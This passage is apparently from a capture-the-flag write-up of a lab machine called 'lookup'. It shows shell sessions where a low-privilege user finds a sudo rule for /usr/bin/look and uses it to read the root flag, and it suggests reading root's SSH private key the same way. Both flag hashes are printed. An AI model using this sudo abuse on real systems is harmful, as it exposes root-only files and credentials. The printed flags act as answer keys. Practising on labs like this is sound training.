just raised the bar for easy, resilient and secure K8s cluster deployment.

https://ubuntu.com/engage/secure-kubernetes-at-the-edge

Expanded Security Maintenance for Applications is not enabled.

7 updates can be applied immediately.
To see these additional updates run: apt list --upgradable

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Thu Jan 11 20:17:32 2024 from 192.168.1.13
think@lookup:~$ id
uid=1000(think) gid=1000(think) groups=1000(think)
think@lookup:~$ ls
user.txt
think@lookup:~$ cat user.txt
38375fb4dd8baa2b2039ac03d92b820e

sudo -l turns up look

think@lookup:~$ sudo -l
[sudo] password for think:
Sorry, try again.
[sudo] password for think:
Matching Defaults entries for think on lookup:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User think may run the following commands on lookup:
(ALL) /usr/bin/look

Just read root.txt directly

think@lookup:~$ sudo look '' /root/root.txt
5a285a9f257e45c68bb6c9f9f57d18e8

Alternatively, read id_rsa and log in directly